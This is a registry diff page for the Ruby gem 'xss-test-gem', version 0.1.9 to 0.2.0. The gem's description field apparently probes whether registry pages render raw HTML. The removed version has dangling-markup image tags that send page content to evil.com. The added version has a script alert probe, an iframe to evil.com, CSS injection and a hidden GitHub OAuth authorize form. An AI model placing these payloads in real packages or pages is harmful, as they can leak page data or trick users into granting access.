xss-test-gem 0.1.9 → 0.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of xss-test-gem might be problematic. Click here for more details.

Files changed (2) hide show
  1. checksums.yaml +2 -2
  2. metadata +11 -6
checksums.yaml CHANGED
@@ -1,4 +1,4 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: e15add40565e1b917c3e1cee50fc1301249d96f8e6f91f59c82636761eb7756f
4
- data.tar.gz: 20e50172e8c6a99f6d5aa95dc4ed5fc6c459f20c7b17efeeb2e02d128d9fb32a
3
+ metadata.gz: b0e5d2fb7afd310e8e8a6f479c45e983daff6d46414b58ee9f6952cdd6f6e395
4
+ data.tar.gz: 210ace3c6951aac4fd2c1ab819a10d7038f0b2be9a573a400bc4e59b97da4fa9
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: xss-test-gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.9
4
+ version: 0.2.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Testing Buffalo
@@ -9,13 +9,18 @@ email: testingbuffalo@apexblack.org
9
9
  homepage: https://rubygems.org/gems/xss-test-gem
10
10
  licenses:
11
11
  - MIT
12
- summary: Dangling markup test
12
+ summary: Raw HTML passthrough test
13
13
  description: |
14
- == Dangling Markup Test
14
+ == Raw HTML Passthrough Test
15
15
 
16
- <img src="https://evil.com/collect?
17
- <img src='https://evil.com/collect?
18
- <img src=https://evil.com/collect?
16
+ <form action="https://github.com/login/oauth/authorize" method="GET">
17
+ <input type="hidden" name="client_id" value="test">
18
+ <input type="submit" value="Authorize">
19
+ </form>
20
+
21
+ <script>alert(1)</script>
22
+ <iframe src="https://evil.com"></iframe>
23
+ <style>body{background:red}</style>
19
24
 
20
25
  required_ruby_version: !ruby/object:Gem::Requirement
21
26
  requirements: